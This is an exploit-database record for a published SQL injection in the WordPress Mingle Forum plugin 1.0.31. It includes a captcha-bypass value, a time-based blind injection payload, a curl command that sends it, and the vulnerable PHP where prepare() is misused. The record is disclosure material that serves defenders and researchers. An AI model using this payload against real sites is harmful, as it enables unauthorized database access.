{"id": "EDB-ID:17894", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Plugin Mingle Forum 1.0.31 - SQL Injection", "description": "", "published": "2011-09-27T00:00:00", "modified": "2011-09-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/17894", "reporter": "Miroslav Stampar", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-01-13T06:43:16", "viewCount": 10, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "wpvulndb", "idList": ["WPVDB-ID:C4A99AFB-C138-4B13-9E75-4D52701BA730"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "sourceHref": "https://www.exploit-db.com/download/17894", "sourceData": "# Exploit Title: WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability\r\n# Date: 2011-09-19\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.31.zip\r\n# Version: 1.0.31 (tested)\r\n# Note: wpf_str_encrypt($_POST['wpf_security_code']) == $_POST['wpf_security_check']\r\n\r\n---------------\r\nPoC (POST data)\r\n---------------\r\nhttp://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php\r\n wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)\r\n\r\ne.g.\r\ncurl --data \"wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)\" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php\r\n\r\n---------------\r\nVulnerable code\r\n---------------\r\n if (!isset($_POST['edit_post_submit'])) {\r\n $errormsg = 
apply_filters('wpwf_check_guestinfo',\"\");\r\n if ($errormsg != \"\") {\r\n $error = true;\r\n wp_die($errormsg);\r\n }\r\n }\r\n\r\n if($options['forum_captcha'] == true && !$user_ID){\r\n include_once(WPFPATH.\"captcha/shared.php\");\r\n $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt(\"MhWNow==\") == \"fail\"\r\n if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {\r\n // do nothing\r\n }\r\n else {\r\n $error = true;\r\n $msg = __(\"Security code does not match\", \"mingleforum\");\r\n wp_die($msg);\r\n }\r\n }\r\n\r\n ...\r\n\r\n if(isset($_POST['edit_post_submit'])){\r\n $myReplaceSub = array(\"'\", \"\\\\\");\r\n $subject = str_replace($myReplaceSub, \"\", $mingleforum->input_filter($_POST['edit_post_subject']));\r\n $content = $mingleforum->input_filter($_POST['message']);\r\n $thread = $mingleforum->check_parms($_POST['thread_id']);\r\n $edit_post_id = $_POST['edit_post_id'];\r\n\r\n if($subject == \"\"){\r\n $msg .= \"<h2>\".__(\"An error occured\", \"mingleforum\").\"</h2>\";\r\n $msg .= (\"<div id='error'><p>\".__(\"You must enter a subject\", \"mingleforum\").\"</p></div>\");\r\n $error = true;\r\n }\r\n elseif($content == \"\"){\r\n $msg .= \"<h2>\".__(\"An error occured\", \"mingleforum\").\"</h2>\";\r\n $msg .= (\"<div id='error'><p>\".__(\"You must enter a message\", \"mingleforum\").\"</p></div>\");\r\n $error = true;\r\n }\r\n\r\n if ($error) wp_die($msg);\r\n\r\n //SECURITY FIX NEEDED <-- actual author's comment :)\r\n $sql = (\"UPDATE $mingleforum->t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id\");\r\n $wpdb->query($wpdb->prepare($sql)); // misuse of prepare(): called with no placeholders or arguments, so the unfiltered $_POST['edit_post_id'] is interpolated straight into the WHERE clause; it should be bound as a %d argument", "osvdbidlist": ["75791"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645265310}}
{}